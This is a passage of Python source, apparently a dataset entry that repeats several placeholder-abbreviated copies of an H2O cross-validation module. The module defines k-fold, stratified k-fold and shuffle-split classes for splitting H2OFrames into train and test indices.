Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
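The base split above works mask-first: subclasses yield boolean test masks, and the base class converts each mask into train/test index lists with np.logical_not. The pattern in isolation (NumPy only; np.bool is written bool here because that alias is gone from current NumPy):

import numpy as np

n_obs = 6
indices = np.arange(n_obs)

def iter_test_masks():
    # toy stand-in for _iter_test_masks: two fixed test folds
    for test_index in ([0, 1, 2], [3, 4, 5]):
        mask = np.zeros(n_obs, dtype=bool)
        mask[test_index] = True
        yield mask

for test_mask in iter_test_masks():
    train_index = indices[np.logical_not(test_mask)]
    test_index = indices[test_mask]
    print(list(train_index), list(test_index))
# [3, 4, 5] [0, 1, 2]
# [0, 1, 2] [3, 4, 5]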
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\n<function token>\n<function token>\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. 
Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the test set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state, for reproducibility. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. 
Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. 
This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n 